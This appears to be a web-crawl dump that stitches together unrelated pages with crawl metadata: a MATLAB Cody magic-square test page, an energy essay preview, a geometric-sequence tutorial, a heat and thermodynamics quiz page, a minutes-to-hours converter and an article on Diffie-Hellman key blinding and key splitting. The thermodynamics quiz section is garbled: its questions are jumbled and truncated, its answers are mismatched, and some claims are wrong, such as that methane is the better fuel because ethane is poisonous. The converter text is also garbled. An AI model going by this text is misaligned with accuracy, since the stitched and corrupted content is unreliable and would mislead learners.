"https://lh5.googleusercontent.com/aj0RnLWPpPRMHErHeNmkkgnWpD9Vbx5p5LTvax3EQgyY9bYPrtx1PtwTruxilhCRPndQFUoqmNvAMBIHktEyEWWFUwaiQj3FU-UOp8GX2blY3BMNd8JDMtQBy_Hzwr2orXszRzOF", null, 
"https://lh5.googleusercontent.com/3GTJ7pqO4bnJpNralGYL3gx5tVvMng8hF548Rxw5pF6E-DS7NTHqYeUIYXL_fvknrY2ckroJp7G_hOSXdppDtuTVod6FxRccWbqspW8vwv1SUEl6o7fmPEf4gEPffn6rfBVVxrpJ", null, "https://lh5.googleusercontent.com/aj0RnLWPpPRMHErHeNmkkgnWpD9Vbx5p5LTvax3EQgyY9bYPrtx1PtwTruxilhCRPndQFUoqmNvAMBIHktEyEWWFUwaiQj3FU-UOp8GX2blY3BMNd8JDMtQBy_Hzwr2orXszRzOF", null, "https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/img/4c2925956f9292.png", null, "https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/img/1dd39cb813f337e2.jpeg", null, "https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/img/2863687467111708.jpeg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8493215,"math_prob":0.88909495,"size":31319,"snap":"2019-26-2019-30","text_gpt3_token_len":7242,"char_repetition_ratio":0.12684017,"word_repetition_ratio":0.048842642,"special_character_ratio":0.22756155,"punctuation_ratio":0.1338503,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98967016,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88],"im_url_duplicate_count":[null,1,null,1,null,9,null,9,null,6,null,9,null,9,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,4,null,5,null,8,null,8,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,3,null,3,null,3,null,3,null,3,null,3,null,2,null,2,null,2,null,2,null,2,null,4,null,2,null,4,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-18T11:37:02Z\",\"WARC-Record-ID\":\"<urn:uuid:537eba92-2900-4064-af1a-2224034b4680>\",\"Content-Length\":\"61700\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bd709e61-2d4e-4c1e-af63-ee54343c56af>\",\"WARC-Concurrent-To\":\"<urn:uuid:db937fd6-8a76-4a93-880d-b7c37982e88b>\",\"WARC-IP-Address\":\"172.217.164.174\",\"WARC-Target-URI\":\"https://codelabs.developers.google.com/codelabs/keras-flowers-squeezenet/index.html?index=..%2F..index\",\"WARC-Payload-Digest\":\"sha1:ONUE5ACJKJAE2LZOLNVEY6CSR6SNPFLH\",\"WARC-Block-Digest\":\"sha1:UQTPQBLP5B34YV56TALEW3JB232H6I25\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195525627.38_warc_CC-MAIN-20190718104512-20190718130512-00531.warc.gz\"}"}
https://nl.mathworks.com/matlabcentral/cody/problems/151-magic/solutions/11823
[ "Cody\n\n# Problem 151. Magic!\n\nSolution 11823\n\nSubmitted on 28 Jan 2012\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nx = magic(3); y_correct = true; assert(isequal(magical(x),y_correct))\n\n2   Pass\nx = magic(7); y_correct = true; assert(isequal(magical(x),y_correct))\n\n3   Pass\nx = eye(7); y_correct = false; assert(isequal(magical(x),y_correct))\n\n4   Pass\nx = magic(2); y_correct = false; assert(isequal(magical(x),y_correct))\n\n5   Pass\nx = magic(3)+1; y_correct = false; assert(isequal(magical(x),y_correct))\n\n6   Fail\nx = flipud(magic(9)); y_correct = true; assert(isequal(magical(x),y_correct))\n\nAssertion failed.\n\n7   Fail\nx = fliplr(magic(11)); y_correct = true; assert(isequal(magical(x),y_correct))\n\nAssertion failed.\n\n8   Pass\nx = magic(4); y_correct = true; assert(isequal(magical(x),y_correct))\n\n9   Fail\nx = flipud(magic(8)); y_correct = true; assert(isequal(magical(x),y_correct))\n\nAssertion failed.\n\n10   Pass\nx = [1 2; 3 4]; y_correct = false; assert(isequal(magical(x),y_correct))\n\n11   Pass\nx = [1 2 3; 4 5 6]; y_correct = false; assert(isequal(magical(x),y_correct))\n\n12   Pass\nx = ones(2); y_correct = false; assert(isequal(magical(x),y_correct))\n\n13   Pass\nx = [7 1 6; 3 5 7; 4 9 3]; y_correct = false; assert(isequal(magical(x),y_correct))" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.59172285,"math_prob":0.99981743,"size":1650,"snap":"2019-51-2020-05","text_gpt3_token_len":546,"char_repetition_ratio":0.2582017,"word_repetition_ratio":0.054393306,"special_character_ratio":0.34969696,"punctuation_ratio":0.16513762,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9985161,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-05T17:50:29Z\",\"WARC-Record-ID\":\"<urn:uuid:ac8c7215-1eb0-4bf9-a32c-ba0639016df7>\",\"Content-Length\":\"80645\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9480235e-71ee-4389-a445-62a1235cb0ce>\",\"WARC-Concurrent-To\":\"<urn:uuid:f217de10-074c-41a3-a9a6-6573fe5be825>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://nl.mathworks.com/matlabcentral/cody/problems/151-magic/solutions/11823\",\"WARC-Payload-Digest\":\"sha1:ID7F33L6NOICKH65RV4EDZGMRR4WHPYT\",\"WARC-Block-Digest\":\"sha1:6VOOCRJFR54BH6OU3B25RA4H44YRDIPC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540481281.1_warc_CC-MAIN-20191205164243-20191205192243-00092.warc.gz\"}"}
https://www.bartleby.com/essay/Physical-Science-P3CH76AZ9EQ
[ "", null, "# Physical Science\n\nDecent Essays\nAssignment 1\n\nEnergy can be converted from one form into another in three basic ways know as the action of force. The first one is gravitational forces which is when gravity accelerates a falling object, its converts its potential energy to kinetic energy. Likewise, when an object is lifted the gravitational field stores the energy exerted by the lifter as potential energy in the earth-object system. The second one is electric and magnetic force fields which is charged particles, upon which electrical fields exert forces, possess potential energy in the presence of an electric field in a way similar to that of an object in a gravitational field. These force fields can accelerate particles, converting a particle's potential energy into" ]
[ null, "https://assets.bartleby.com/1.17/images/placeholders/essay_preview.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9537343,"math_prob":0.92687106,"size":7044,"snap":"2023-14-2023-23","text_gpt3_token_len":1355,"char_repetition_ratio":0.15269886,"word_repetition_ratio":0.006849315,"special_character_ratio":0.18526405,"punctuation_ratio":0.09468822,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97981304,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-28T21:09:10Z\",\"WARC-Record-ID\":\"<urn:uuid:b23c9827-4a1d-47ab-91a2-39183701abb3>\",\"Content-Length\":\"51840\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ff405dc1-f746-4fa5-a3f1-d7de79b302e4>\",\"WARC-Concurrent-To\":\"<urn:uuid:eac7383c-459a-473c-bb32-de8d9ea4f3e0>\",\"WARC-IP-Address\":\"18.67.65.30\",\"WARC-Target-URI\":\"https://www.bartleby.com/essay/Physical-Science-P3CH76AZ9EQ\",\"WARC-Payload-Digest\":\"sha1:NBTNJNNRDQMYEEUGMKER73CGFR2WWOIU\",\"WARC-Block-Digest\":\"sha1:FBBZ2PU6HMICMTMYIIO2M5TBBVOENAHI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296948871.42_warc_CC-MAIN-20230328201715-20230328231715-00188.warc.gz\"}"}
https://mathsux.org/tag/geometric-sequence/
[ "## What is a Geometric Sequence?\n\nGeometric Sequence Formula:\n\nan=a1r(n-1)\n\na1 = First Term\n\nr=Common Ratio (Number Multiplied/Divided by each successive term in sequence)\n\nn= Term Number in Sequence\n\nHi everyone and welcome to Mathsux! In this post, we are going to answer the question, what is a geometric sequence (otherwise known as a geometric progression)? We will accomplish this by learning how to identify a geometric sequence, then we will break down the geometric sequence formula an=a1r(n-1), and solve two different types of examples. As always if you want more questions, check out the video below and the practice problems at the end of this post. Happy calculating! 🙂\n\n## What are Geometric Sequences?\n\nGeometric sequences are a sequence of numbers that form a pattern when the same number is either multiplied or divided to each subsequent term. Take a look at the example of a geometric sequence below:\n\nExample:\n\nNotice we are multiplying 2 by each term in the sequence above. If the pattern were to continue, the next term of the sequence above would be 64. This is a geometric sequence!\n\nIn this geometric sequence, it is easy for us to see what the next term is, but what if we wanted to know the 15th term?  Instead of writing out and multiplying our terms 15 times, we can use a shortcut, and that’s where the Geometric Sequence formula comes in handy!\n\n## Geometric Sequence Formula:\n\nTake a look at the geometric sequence formula below, where each piece of our formula is identified with a purpose.\n\nan=a1r(n-1)\n\na1 = The first term is always going to be that initial term that starts our geometric sequence. In this case, our sequence is 4,8,16,32, …… so our first term is the number 4.\n\nr= One key thing to notice about the formula below that is unique to geometric sequences is something called the Common Ratio. The common ratio is the number that is multiplied or divided to each consecutive term within the sequence.\n\nn= Another interesting piece of our formula is the letter n, this always stands for the term number we are trying to find. A great way to remember this is by thinking of the term we are trying to find as the nth term, which is unknown.\n\nNow that we broke down our geometric sequence formula, let’s try to answer our original question below:\n\n## Example #1: Common ratio r>1\n\nStep 1: First let’s identify the common ratio between each previous and subsequent term of the sequence. Notice each term in the sequence is multiplied by 2 (as we identified earlier in this post). Therefore, our common ratio for this sequence is 2.\n\nStep 2: Next, let’s write the geometric sequence formula and identify each part of our formula (First Term=4, Term number=15, common ratio=2).\n\nStep 3: Now let’s fill in our formula and solve with the given values.\n\nLet’s look at another example where, the common ratio is a bit different, and instead of multiplying a number, this time we are going to be dividing the same number from each subsequent term, (this can also be thought of as multiplying by a common ratio that is a fraction):\n\n## Example #2: Common ratio 0<r<1\n\nStep 1: First let’s identify the common ratio between each number in the sequence. 
Notice each term in the sequence is divided by 2 (or multiplied by 1/2 that way it is shown below).\n\nStep 2: Next, let’s write the geometric sequence formula and identify each part of our formula (First Term=1000, Term number=10, common ratio=1/2).\n\nStep 3: Next let’s fill in our formula and solve with the given values.\n\nThink you are ready to practice solving geometric sequences on your own? Try the following practice questions with solutions below:\n\n## Practice Questions:\n\n1. Find the 12th term given the following sequence: 1250, 625, 312.5, 156.25, 78.125, ….\n2. Find the 17th term given the following sequence: 3, 9, 27, 81, 243,…..\n3. Find the 10th term given the geometric sequence: 5000, 1250, 312.5, 78.125 …..\n4. Shirley has \\$100 that she deposits in the bank. She continues to deposit twice the amount of money every month. How much money will she deposit in the twelfth month at the end of the year?\n\n## Fun Fact!\n\nDid you know that the geometric sequence formula can be considered an explicit formula? An explicit formula means that even though we do not know the other terms of a sequence, we can still find the unknown value of any term within the given sequence. For example, in the first example we did in this post (example #1), we wanted to find the value of the 15th term of the sequence. We were able to do this by using the explicit geometric sequence formula, and most importantly, we were able to do this without finding the first 14 previous terms one by one…life is so much easier when there is an explicit geometric sequence formula in your life!\n\nOther examples of explicit formulas can be found within the arithmetic sequence formula and the harmonic series.\n\n## Related Posts:\n\nLooking to learn more about sequences? You’ve come to the right place! Check out these sequence resources and posts below. Personally, I recommend looking at the finite geometric sequence or infinite geometric series posts next!\n\nArithmetic Sequence\n\nRecursive Formula\n\nFinite Arithmetic Series\n\nFinite Geometric Series\n\nInfinite Geometric Series\n\nGolden Ratio in the Real World\n\nFibonacci Sequence\n\nStill, got questions? No problem! Don’t hesitate to comment below or reach out via email. And if you would like to see more MathSux content, please help support us by following ad subscribing to one of our platforms. Thanks so much for stopping by and happy calculating!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9348094,"math_prob":0.9882632,"size":5346,"snap":"2023-40-2023-50","text_gpt3_token_len":1205,"char_repetition_ratio":0.18532385,"word_repetition_ratio":0.07891892,"special_character_ratio":0.23176207,"punctuation_ratio":0.11834862,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99942696,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-05T01:47:53Z\",\"WARC-Record-ID\":\"<urn:uuid:6f2b02e1-71ba-49c9-8613-eacea19c4d3e>\",\"Content-Length\":\"140813\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:514d92b1-d04b-47a4-b4db-1e02cb550433>\",\"WARC-Concurrent-To\":\"<urn:uuid:dc7f8ce5-e697-4d48-a89f-d02ff2224036>\",\"WARC-IP-Address\":\"50.16.223.119\",\"WARC-Target-URI\":\"https://mathsux.org/tag/geometric-sequence/\",\"WARC-Payload-Digest\":\"sha1:ZNWXSMO6HN2PJA4BDFIKRPC74XSXRQKX\",\"WARC-Block-Digest\":\"sha1:E62G74ZAAOT2SJAA5F7ESPGXWTTJAHAZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511717.69_warc_CC-MAIN-20231005012006-20231005042006-00054.warc.gz\"}"}
http://dunanscastle.tv/insect/rpa/trippy/72778696f0692462055920c8-heat-and-thermodynamics-mcq-with-solutions
[ "# heat and thermodynamics mcq with solutions\n\nCarnot cycle has maximum efficiency for (a) reversible engine (b) irreversible engine (c) new engine (d) petrol engine (e) diesel engine. 1. Answer: a. 110 J of heat is added to a gaseous system, C neither mass nor energy crosses the boundaries of the system. A sink, that is, the system where heat is rejected, is essential for the conversion of heat into work. Heat is a form of:.\n\n-78. Questions are made from the laws of Thermodynamics, basic properties, and work-heat transfer. View Answer. Thermal conductivity is mainly a function of the motion of the free electrons therefore property of a material, not a path function. One gram of sample of NH 4 NO 3 is decomposed in a bomb calorimeter. Chemical thermodynamics entails not only laboratory measurements of various thermodynamic properties, but also the application of mathematical methods to the study of chemical Zeroth 2. What is the molar heat of decomposition of NH 4 NO 3? Chapter 1: Some Basic Concepts of Chemistry Class 11 MCQ Questions. B Thermal Energy . Heat is a form of:.\n\nThermodynamics is a branch of science that pacts with the connection between heat and other aspects of energy. Check the below NCERT MCQ Questions for Class 11 Physics Chapter 12 Thermodynamics with Answers Pdf free download. C S02, NH3, C02, moisture. In a clinical thermometer, the mercury in the capillary tube does not contract 6.\n\na. mkT. (ii) the extent to which a chemical reaction proceeds. Why mercury is used as a thermometric Ans: 1st law of Thermodynamics. 2. Specific heat and latent heat of fusion and vaporization. Second 4. Heat C. Chemical energy D. Thermal energy 2. Page-2 section-1 Thermodynamic equation of state. C Entropy . and P.E. Energy balance 149. contact. Q1) Water falls from a height 500m. Heat and Thermodynamic Physics MCQs 1.\n\nB hyperbolic expansion.\n\nOne litre of water at 30 degree Centigrade is mixed with one liter of water at 50 degree Centigrade. c. both saturated and unsaturated air.\n\n1. Learn the MCQ Question for Class 11 Chemistry cross-check your answers with definite Solutions and furthermore Check your preparation for examinations. Here Q 2 = 50 J. Q 1 = 80 J. Class 11 Chemistry MCQ with Answers Chapter Wise. Carnot engine is the base engine for all the other engines. Explanation: According to the description of path given, through the path A and path B system undergoes cycle, Writing the first law equation for path A, Q A = E A + W A and for path B, Q B = E B + W B. A. Heat and Thermodynamics Mcqs for Preparation - PakMcqs MCQ in Thermodynamics Part 1 Answers. An open system is one in which. heat and thermodynamics these questions are' 'thermodynamics multiple choice questions and answers april 21st, 2018 - mcq quiz on thermodynamics multiple choice questions and answers on thermodynamics Heat And Thermodynamics Multiple Choice Questions Heat and Thermodynamics MCQs With Answers The Sun is a major source of:. 92. C. 7. 2. First 3. 1. 64 If a fluid expands suddenly into vacuum through an orifice of large dimension, then such a process is called. (d) mass crosses the boundary but not the energy.\n\n8527521718; Online Support; Menu. ANSWER. These questions are chosen from a collection of most authoritative and best reference books on Physics. 9. (b) heat can be transferred for low temperature to high temperature source by using refrigeration cycle. 
Learn and Practice Thermodynamics variety of MCQ Questions and Answers of Mechanical Engineering, Useful for GATE Exams, Competitive exams, Entrance exams. Solution: (b) Heat and work cannot be transferred into the ice kept in a well insulated thermos flask, hence, it is an isolated system. MCQs: Thermodynamics Test Questions - Mcqs Clouds is a portal which provide MCQ Questions for all competitive examination such as GK mcq question, competitive english mcq question, arithmetic aptitude mcq question, Data Intpretation, C and Java programing, Reasoning aptitude questions and answers with easy explanations. 3.5 . - 2 Answer: (a) 1 : 1. Answer. C. system has temperature. Answer. Definition: Chemical thermodynamics is the study of the interaction of heat and work with chemical reactions or physical state changes within the confines of thermodynamic laws. d. Equal in all the cases. C. Entropy change. Q2. It has four fundamental laws. Q9. If you want to get knowledge on an open system, closed system, and isolated system; intensive and extensive properties, pure substance, homogeneous and heterogeneous system; triple point and critical point and the laws of thermodynamic systems then you go through the energy. 7.A sample of an ideal gas has volume 2V, Pressure 2P and Temperature T.The mass of each molecule of the gas is m.The density of the gas is. 5.\n\nc) The triple point of water is one of the reference points on the thermodynamic scale of temperature. Engineering Thermodynamics MCQ with Answers. 1) All the commercial liquid fuels are derived from natural petroleum (or crude oil). 24. C. Ethane is a better fuel than CH 4 C H 4.\n\nIf the temperature of the plate increases, what Assuming, that the refrigerator cycle is reversible, for every joule of work done, the heat delivered to the surrounding will be nearly: (a) 10 J (b) 20 J (c) 30 J (d) 50 J. Heat from the Sun reaches Earth by:. b) The first law of thermodynamics is also known as the law of thermal equilibrium. Which of the following concepts best describes a chlorophyll molecule absorbing light and changing it into chemical energy?\n\nNow solar energy enters the room from windows at an average rate of 1 kJ/s while a 100-W fan is turned on to circulate the air in the room. Chemical thermodynamics entails not only laboratory measurements of various thermodynamic properties, but also the application of mathematical methods to the study of chemical Heat of combustion of methane and ethane are -291.7 Kcal & 441.2 Kcal respectively: Methane is a better fuel because ethane is poisonous. Answer: c. Clarification: As Q=U+W.\n\n(b) The first law of thermodynamics is also known as the law of thermal equilibrium. B mass crosses the boundary but not the energy. It deals with the concepts of heat, temperature and interconversion of heat into other forms of energy i.e., electrical, mechanical, chemical magnetic etc. (c) heat can be transferred from low temperature to high temperature source if COP of process is more than unity (d) heat cant be transferred from low temperature to high temperature source without the aid of external energy Chapter 2: Structure of Atom Class 11 MCQ Questions. An aluminum plate has a circular hole. 81. 
thermodynamics these questions are' 'thermodynamics multiple choice questions and answers april 21st, 2018 - mcq quiz on thermodynamics multiple choice questions and answers on thermodynamics Heat And Thermodynamics Multiple Choice Questions Heat and Thermodynamics MCQs With Answers The Sun is a major source of:.\n\nD both energy and mass cross the boundaries of the system. Thermodynamics Class 11 MCQs Questions with Answers. 1535 kJ/kg. D. H = U + PV. 2. Deals with conversion of mass and energy. C. specific heat capacity. Learn Engineering Thermodynamics MCQ questions & answers are available for a Mechanical Engineering students to clear GATE exams, various technical interview, competitive examination, and another entrance exam. Multiple Choice Questions 1. Third Thermodynamics Physics Practice questions, MCQs, Past Year Questions (PYQs), NCERT Questions, Question Bank, Class 11 and Class 12 Questions, NCERT Exemplar Questions and Remain the same always. ECAT preparation - Heat and Thermodynamics,Multiple Choice Questions on Thermodynamics - Quiz. Access Free Mcqs On Heat And Thermodynamics With Answers MCQs: 2 . Internal energy of a perfect gas is.\n\n(a) wholly potential energy. Specific heat and latent heat of fusion and vaporization. The internal energy change in a system that has absorbed 2 kcal of heat and done 500 J of work is.\n\n1." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8876774,"math_prob":0.8157602,"size":27751,"snap":"2022-27-2022-33","text_gpt3_token_len":6410,"char_repetition_ratio":0.20575197,"word_repetition_ratio":0.18913044,"special_character_ratio":0.22492883,"punctuation_ratio":0.13859154,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9743005,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-17T19:17:08Z\",\"WARC-Record-ID\":\"<urn:uuid:64bb1cbd-7abe-4629-b4dc-aeb492424bbd>\",\"Content-Length\":\"66975\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:666da858-1a36-4fe6-b1bc-e7d198ca7829>\",\"WARC-Concurrent-To\":\"<urn:uuid:46aaee08-2609-4ecb-a620-2a503d8a7e35>\",\"WARC-IP-Address\":\"185.181.126.124\",\"WARC-Target-URI\":\"http://dunanscastle.tv/insect/rpa/trippy/72778696f0692462055920c8-heat-and-thermodynamics-mcq-with-solutions\",\"WARC-Payload-Digest\":\"sha1:EKYV56DL3ABRFGL4KMQKVY7XJSUD4YWX\",\"WARC-Block-Digest\":\"sha1:VMUCVZTZIH7X2QMLMEGVFPVB4WCLJX54\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573104.24_warc_CC-MAIN-20220817183340-20220817213340-00345.warc.gz\"}"}
https://hoursfinder.com/0-9-hours/127-minutes-to-hours.html
[ "", null, "We collected information about 127 Minutes To Hours for you. Follow the liks to find out everything about 127 Minutes To Hours.\n\n### Convert 127 Minutes to Hours - CalculateMe.com\n\nhttps://www.calculateme.com/time/minutes/to-hours/127\n26 rows\n\n### What Is 127 Minutes In Hours? (127 min to hr)\n\nhttps://minuteshours.com/127-minutes-to-hours\n10 rows\n\n### 127 Minutes to Hours | 127 min to hr - Convertilo\n\nhttps://convertilo.com/127-minutes-to-hours\n10 rows\n\n### 127 mins in hours. Convert 127 mins to hours - TotalCalc\n\nhttps://totalcalc.com/127-mins-to-hours\nWhat is 127 Minutes (min) in Hours (h)? How to convert 127 mins to hours. What is 127 Minutes (min) in Hours (h)? How many utes (m in 127 M? 127 mins is 2.1166666667 hours.\n\n### What is 127 Minutes in Hours? Convert 127 min to hr\n\nhttps://whatisconvert.com/127-minutes-in-hours\nTo calculate 127 Minutes to the corresponding value in Hours, multiply the quantity in Minutes by 0.016666666666667 (conversion factor). In this case we should multiply 127 Minutes by 0.016666666666667 to get the equivalent result in Hours: 127 Minutes x 0.016666666666667 = 2.1166666666667 Hours.\n\n### Minutes to Hours Converter - Calculator Soup\n\nhttps://www.calculatorsoup.com/calculators/conversions/minutes-to-hours.php\nWritten mathematically as a value of 1 it is [60 min / 1 hr] = 1. The inverse is also true that [1 hr / 60min] = 1. To convert minutes to hours, divide the minutes by 60. To show an example and how it works mathematically, let's say we want to convert 195 minutes to hours. We multiply by [1 hr / …\n\n## Searching for 127 Minutes To Hours?\n\nYou can just click the links above. The info is collected for you." ]
[ null, "https://hoursfinder.com/img/post.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7829637,"math_prob":0.7725232,"size":1307,"snap":"2022-05-2022-21","text_gpt3_token_len":361,"char_repetition_ratio":0.19646968,"word_repetition_ratio":0.054054055,"special_character_ratio":0.32593727,"punctuation_ratio":0.14925373,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97804475,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-24T00:24:04Z\",\"WARC-Record-ID\":\"<urn:uuid:7683fc31-335c-4630-99ca-f254f434c62c>\",\"Content-Length\":\"17011\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eede5cc4-f2a7-4739-90b3-6bbe48bb64be>\",\"WARC-Concurrent-To\":\"<urn:uuid:958cd963-95b1-40a4-9225-c9232941bfa4>\",\"WARC-IP-Address\":\"104.21.27.216\",\"WARC-Target-URI\":\"https://hoursfinder.com/0-9-hours/127-minutes-to-hours.html\",\"WARC-Payload-Digest\":\"sha1:Z6QN5ENIBXIEBVBORUSZW2Y7BTQB2TTE\",\"WARC-Block-Digest\":\"sha1:3KJOQVBAUTU7GWRJYEA3CRDYGQXHDPTF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662562106.58_warc_CC-MAIN-20220523224456-20220524014456-00527.warc.gz\"}"}
https://mathmesh.com/Documentation/Design/mesh-13-meta-dh.html
[ "# Mesh-13 Meta-Cryptography II: Advanced Diffie-Hellman\n\n#### Operations on Cryptographic Keys\n\nHaving described the basic Diffie Hellman scheme described in the textbooks, we can use it in a lot of ways that the textbooks don't mention.\n\nFor ease of explanation, the schemes are shown using traditional Diffie-Hellman using multiplication modulo a prime. But the techniques themselves rely only on the properties of a commutative group and thus apply to any Diffie-Hellman scheme including elliptic curve variants. The only caveat being that some of the particular elliptic curve forms used for efficiency can make implementation a little challenging.\n\nOne of the things I realized in writing this document is that Diffie-Hellman is such a flexible system that in several cases there is more than one way to achieve a particular effect.\n\n## Hierarchical key agreement\n\nAs shown in the introduction, to generate a Diffie-Hellman key, Alice\n\n• Chooses random number a from the set 1..(p-1)\n• Calculates the public key Pa = ea mod p\n\nThis works well for the traditional use case for public key cryptography in which Alice generates a public key pair and publishes her public key in a directory where anyone can look it up. But what if we wanted to design a cryptographic protocol in which Alice uses a different public key pair for every other person she communicates with without the need to remember the key pair she used for each one?\n\nThis particular requirement occurs in many anonymity and privacy protection protocols such as TOR and the use of public key based authentication at\n\nA simple way that Alice can do this is to generate a master private key a and use a cryptographic digest function H(m) that has been modified to provide a number in the range 1..(p-1) rather than the usual sting of bits to create a new keypair for each party she wants to communicate with. If Alice wants to communicate with the site example.com, she calculates a new private key for that site as:\n\naexample.com = H(a + 'example.com')\n\nAlternatively, we can perform the addition after the digest function:\n\naexample.com = a + H('example.com')\n\nYet another way to achieve the same result is to use the key pair addition property described below.\n\n## Multiplying private keys.\n\nIn the introduction, we saw that\n\n(eb mod p)a mod p = (ea mod p)b mod p = eab mod p\n\nWe can perform a key agreement with three keys just as easily:\n\n((ea mod p)b mod p)c mod p = eabc mod p\n\nAgain, we can do the exponentiation operations in any order we choose. Or if we happen to know more than one of the private keys, we can simply multiply them together instead:\n\n(eb mod p)ac mod p = (ea mod p)bc mod p = eabc mod p\n\nThis particular scheme might not appear to be very useful as both the sender and the receiver have to know the value c. But if you look closely you will notice that we don't perform the private key operation with the private key, we use the private key multiplied by a random value that changes every time.\n\nThe reason this is important is that implementing an exponentiation step (or its elliptic curve equivalent) requires a processor to make a series of calculations whose pattern depends on the private key. And if the software isn't written exactly so, minute variations in the pattern of processing can reveal the private key to an attacker observing the power consumption, timing, radio emissions or even in some cases the noise made by the device. 
These are known as sideband attacks and a particularly effective form of sideband attack developed by Paul Kocher involves causing the device to perform a sequence of private key operations in a loop and performing sophisticated statistical analysis to uncover the private key.\n\nMultiplying the private key by a constant factor is a form of what is known as key blinding, a powerful technique for defeating sideband attacks.\n\nMultiplying the private key on both sides with a common constant provides us with a method of guiding protocol implementers to the use of a key blinding approach. But what if we want to use key blinding with a regular Diffie-Hellman protocol? No problem, just split the private key into two parts whose sum is the private key\n\na = x + y\n\nWe then perform the Diffie-Hellman key agreement separately on x and y and multiply the result together.\n\n(eb mod p)x mod p . (eb mod p)y mod p = ebx.eby mod p = eab mod p\n\nThis approach works very well if a is large. But it is a random number is just as likely to be 1 as any other number. If a is small then we don't get as much key blinding effect as we would like. So instead we take advantage of a little piece of additional math:\n\nep-1 mod p = 1\n\nWhy does this work? Well 1 is the identity for modular multiplication and the order of the group is p-1. If we keep multiplying a number by itself in a group with a finite number of elements, eventually we must run out of numbers and arrive at the original number. Once this happens then the sequence must repeat. And the number of elements in the group is the order of the group by definition. Since any number multiplied by the identity is itself, the result we encounter before running out of numbers is the identity element of the group.\n\nWhat this means is that we can pick any x and y provided that they satisfy:\n\na = x + y mod p-1\n\nThis feature of Diffie-Hellman allows us to achieve a very powerful technique called proxy re-encryption. Instead of splitting the private key, performing both Diffie-Hellman calculations on the same computer and combining the results, we split the private key and send the two (or more) parts to different computers.\n\nSplitting the private key in this way allows us to create a system in which two (or more) parties must both participate in order to decrypt a message. For example, one of the parties might be a cloud service that has the function of monitoring how many classified documents a user is decrypting without being able to decrypt them itself and thus be a potential source of compromise.\n\nThere are many, many other applications of Proxy Re-Encryption which will be described in a companion paper.\n\n## Combing Key Pairs\n\nAs we saw in the example above, we can split a private key into two parts, perform the Diffie-Hellman operation on each part and combine the results. The same property allows us to do combine two key pairs to derive a third.\n\nGiven two Diffie-Hellman keys (a, ea) and (b, eb), we can create a third keypair (c, ec) where:\n\nc = a + b\n\nec = ea.eb = ea+b = ec\n\nOne very important way that we can make use of this feature is in a protocol I proposed called co-operative key generation. In this protocol we are concerned with the problem of a devices whose random number generators are insufficiently random being used to generate keypairs. A party (e.g. 
